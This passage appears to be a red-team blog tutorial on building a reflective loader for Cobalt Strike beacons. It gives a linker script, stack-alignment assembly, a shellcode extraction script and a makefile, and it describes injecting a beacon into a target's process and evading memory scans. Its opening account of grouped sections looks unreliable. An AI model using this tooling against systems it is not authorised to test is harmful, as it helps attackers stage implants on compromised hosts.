Grouped sections allow two or more adjacent sections to be treated as a single unit for the purposes of memory mapping and file alignment. This is accomplished by assigning the same section characteristics to each section in the group and specifying the total size of the group in the section header of the first section. This means that the sections within a group can share the same protection attributes and alignment requirements, which can help to reduce file size and improve loading performance.

Our macro looks like this -

#define GRP_SEC( x ) __attribute__(( section( ".text$" #x ) ))

Windows documentation states

When determining the image section that will contain the contents of an object section, the linker discards the "$" and all characters that follow it. Thus, an object section named .text$X actually contributes to the .text section in the image.

However, the characters following the "$" determine the ordering of the contributions to the image section. All contributions with the same object-section name are allocated contiguously in the image, and the blocks of contributions are sorted in lexical order by object-section name. Therefore, everything in object files with section name .text$X ends up together, after the .text$W contributions and before the .text$Y contributions.
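The two rules in that quote can be mimicked in a few lines of C. This is only an illustration of the naming convention, not how any linker is implemented: image_section_name is a made-up helper that drops the "$" suffix, and the lexical ordering is just what strcmp gives us on the full object-section names.

```c
#include <stddef.h>
#include <string.h>

/* Copies the part of an object-section name before '$' into out, which is
 * the image section the contribution ends up in. Returns out. */
char *image_section_name(const char *object_section, char *out, size_t out_size)
{
    size_t len = strcspn(object_section, "$");  /* length up to '$' or the end */

    if (out_size == 0)
        return out;
    if (len >= out_size)
        len = out_size - 1;                     /* truncate to fit the buffer */

    memcpy(out, object_section, len);
    out[len] = '\0';
    return out;
}
```

So .text$A and .text$F both land in .text, and because .text$A sorts before .text$F, code tagged GRP_SEC(A) ends up ahead of code tagged GRP_SEC(F) in the final section.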

In order to implement this we can create a linker file using the SECTIONS command which is used to create different sections in the final PE file generated. This is a technique used in TitanLdr.

SECTIONS
{
   .text :
   {
      *( .text$A )
      *( .text$B )
      *( .text$C )
      *( .text$D )
      *( .text$E )
      *( .rdata* )
      *( .text$F )
    }
}

Stack Alignment

We'll be compiling our shellcode in 64bit, which means we will need a 16-byte stack alignment. That is to say that if you push only one 8-byte value onto the stack, you should pad it by adding another 8 bytes. This is due to a requirement imposed by utilizing 128-bit XMM registers. We can make sure this stack alignment is implemented in some simple assembly code.

[BITS 64]

Extern ZenLdr

GLOBAL Start

[SECTION .text$A]

Start:

    push rsi
    mov rsi, rsp
    and rsp, 0FFFFFFFFFFFFFFF0h
    sub rsp, 020h
    call ZenLdr
    mov rsp, rsi
    pop rsi
    ret

Quick overview -

[BITS 64] - Highlights this assembly code is operating within an x64 architecture.

Extern ZenLdr - Declares ZenLdr, the name of our main C function, as a symbol that is defined outside this assembly file so that we can call it from here.

GLOBAL Start - Highlights a procedure that will take place within our assembly code, but also allows us to call this procedure within our C code.

Now, your keen eye may notice the [SECTION .text$A]. This is what we were previously discussing in the Section Alignment walkthrough. Here we are placing the instructions of our Start procedure in the .text$A portion of our text section, so Start is the first code in our shellcode and the first to run. It has to run first because if our stack isn't aligned correctly the rest of the code may crash instead of executing.

The actual Start procedure works like this -

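- Push RSI onto the stack to preserve it
- Copy RSP into RSI so it can be restored later
- Align RSP down to a 16-byte boundary
- Reserve 0x20 bytes on the stack (the shadow space the Windows x64 calling convention expects) for the call into our main function
- Call the entry point of the main function
- Restore the original value of RSP
- Restore RSI
- Return to the caller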
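
If the arithmetic is easier to follow outside of assembly, the same steps can be sketched in Python. This is just a model of what happens to RSP, and the sample addresses are made up. The function names start_prologue and start_epilogue are mine and don't exist in the loader.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF  # keep values within 64 bits, like a real register


def start_prologue(rsp):
    """Mirror the RSP changes made by Start before `call ZenLdr`.

    Returns (saved_rsp, aligned_rsp): the value copied into RSI and the
    value RSP holds at the moment of the call.
    """
    rsp = (rsp - 8) & MASK64          # push rsi
    saved = rsp                       # mov rsi, rsp
    rsp &= 0xFFFFFFFFFFFFFFF0         # and rsp, 0FFFFFFFFFFFFFFF0h
    rsp = (rsp - 0x20) & MASK64       # sub rsp, 020h
    return saved, rsp


def start_epilogue(saved):
    """Mirror the RSP changes made after ZenLdr returns."""
    rsp = saved                       # mov rsp, rsi
    rsp = (rsp + 8) & MASK64          # pop rsi
    return rsp                        # value of RSP when `ret` executes


# Hypothetical entry values of RSP, including a misaligned one.
for entry in (0x14FF28, 0x14FF2C):
    saved, aligned = start_prologue(entry)
    print(hex(entry), "->", hex(aligned), "aligned:", aligned % 16 == 0)
```

The AND only ever clears the low four bits, so RSP can only move down (towards free stack space) and never overwrites anything the caller already pushed.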

PE Extraction

Once our code is compiled into an executable we'll need to extract the raw binary in order to execute it as shellcode. There are a couple of ways of doing this. One is to run objdump on our executable and place the output in a .bin file. However, Python has a module called pefile that makes it easy to extract just the .text section, which is what the CS documentation asks for -

The reflective loader's executable code is the extracted .text section from a user provided compiled object file. The extracted executable code must be less than 100KB.
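
To show what the extraction boils down to, here is a rough sketch that pulls out .text using only the Python standard library. To be clear, this is not the extract.py from the repo and it doesn't use pefile; it just walks the PE headers by hand. The function names are my own, and treating "100KB" as 100 * 1024 bytes is an assumption.

```python
import struct

MAX_LOADER_SIZE = 100 * 1024  # assumption: "100KB" in the CS docs means 100 * 1024 bytes


def extract_text_section(pe_bytes):
    """Return the raw bytes of the .text section of a PE image."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    # e_lfanew at offset 0x3C points to the "PE\0\0" signature.
    (e_lfanew,) = struct.unpack_from("<I", pe_bytes, 0x3C)
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")

    coff = e_lfanew + 4  # 20-byte COFF file header follows the signature
    (num_sections,) = struct.unpack_from("<H", pe_bytes, coff + 2)
    (opt_header_size,) = struct.unpack_from("<H", pe_bytes, coff + 16)
    section_table = coff + 20 + opt_header_size

    for index in range(num_sections):
        entry = section_table + index * 40  # each section header is 40 bytes
        name = pe_bytes[entry:entry + 8].rstrip(b"\0")
        virtual_size, _rva, raw_size, raw_offset = struct.unpack_from(
            "<IIII", pe_bytes, entry + 8
        )
        if name == b".text":
            # Trim the file-alignment padding when VirtualSize is known.
            size = min(virtual_size, raw_size) if virtual_size else raw_size
            return pe_bytes[raw_offset:raw_offset + size]
    raise ValueError("no .text section found")


def extract_loader(pe_bytes):
    """Extract .text and enforce the documented size limit."""
    code = extract_text_section(pe_bytes)
    if len(code) >= MAX_LOADER_SIZE:
        raise ValueError("extracted loader is not under 100KB")
    return code
```

Usage would be something along the lines of reading ZenLdr.x64.exe in binary mode, passing the bytes to extract_loader, and writing the result to ZenLdr.x64.bin.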

Compilation

In order to compile the UDRL we'll be using x86_64-w64-mingw32-gcc. When compiling the code certain flags need to be put in place in order to set the correct function ordering, apply the linker script, and prevent the inclusion of extraneous code.

Below is an example of the complete makefile.

# Cross-compiler targeting 64-bit Windows
CC_X64	:= x86_64-w64-mingw32-gcc

# Size-optimised build with no standard library, startup code or unwind tables
CFLAGS	:= $(CFLAGS) -Os -fno-asynchronous-unwind-tables -nostdlib
CFLAGS	:= $(CFLAGS) -fno-ident -fpack-struct=8 -falign-functions=1
CFLAGS	:= $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -w
# SectionLink.ld is the linker script that orders the .text$X sections
CFLAGS	:= $(CFLAGS) -falign-labels=1 -fPIC -Wl,-TSectionLink.ld
LFLAGS	:= $(LFLAGS) -Wl,-s,--no-seh,--enable-stdcall-fixup

OUTX64	:= ZenLdr.x64.exe
BINX64	:= ZenLdr.x64.bin

.PHONY: all clean

all:
	@ echo "[+] Compiling ZenLdr"
	@ nasm -f win64 asm/Start.asm -o Start.x64.o
	@ nasm -f win64 asm/GetIp.asm -o GetIp.x64.o
	@ $(CC_X64) *.c Start.x64.o GetIp.x64.o -o $(OUTX64) $(CFLAGS) $(LFLAGS) -I.
	@ echo "[+] Extracting .text section into $(BINX64)"
	@ python3 python3/extract.py -f $(OUTX64) -o $(BINX64)

clean:
	@ rm -rf *.o
	@ rm -rf *.bin
	@ rm -rf *.exe

Execution

Now we're in the end game :p. In order to load our binary into CS we'll need an Aggressor Script that uses the BEACON_RDLL_GENERATE hook to implement our UDRL in CS.

There are plenty of ways this payload can be delivered, but one scenario could be that you already have a beacon on your target machine and you want to inject into another process your target is running.

It should be noted I'm using CS 4.7.2. In version 4.6 it was apparently possible to make an .exe beacon that executes the shellcode directly (demonstrated on the KaynStrike GitHub), but that doesn't work in 4.7 for some reason (my assembly and debugging skills aren't good enough to figure out why either lol). Also, at the time of writing I believe CS is now on version 4.8, which I have not tested.

The Windows version for the target machine was 10.0.19045.

Below is a demonstration.

Conclusion

So there you have it! A working proof of concept UDRL. It must be noted that my PoC is barebones; there's so much functionality that can be added to it, but the point of this exercise was just to understand the process behind making one. Recently, security researcher and red teamer Kyle Avery made AceLdr. This UDRL evades memory scanning using techniques like Return Address Spoofing. Definitely check out the blog post and YouTube video!

There's still a lot more for me to understand regarding UDRLs but I hope this blog has at least made some things clearer...if not, sorry for wasting your time :p!

If you've got this far and feel there's something that could be explained better, please let me know :)

Link to the code if you're interested - https://github.com/Mav3rick33/ZenLdr

Credits

Austin Hudson - TitanLdr (The original UDRL which all others have built their PoCs from)

C5pider - KaynStrike (Another UDRL implementation taking inspiration from TitanLdr)

Modexp - Cool security researcher and developer, you should definitely check out his blog

Hasherezade - Another cool security researcher and developer, check out her blog

Matt Graeber - Writing Optimized Windows Shellcode in C (One of the earliest documentations of writing shellcode in C)

Cobalt Strike - User Defined Reflective Loader documentation

ReactOS - cool website that has a lot of info regarding Undocumented Windows APIs

C Compilation - Concise video about how C code compiles

Tmxlab - (Original language is Korean)

Donut - https://github.com/TheWover/donut/tree/dafea1702ce2e71d5139c4d583627f7ee740f3ae (Shellcode loader partly developed by Modexp)

PIC Your Malware - A cool YouTube video on position independent code

Understanding Windows x64 Assembly - Great tutorial for understanding x64 Assembly

Reflective DLL Injection explained - A good video I found explaining RDI

Memory Based Library Loading Someone Did That Already - Great video about the concept of MM and how it's been around since the 90s

Life Of Binaries - The BEST overview of the Portable Executable, I referenced these videos tons of times to better my understanding
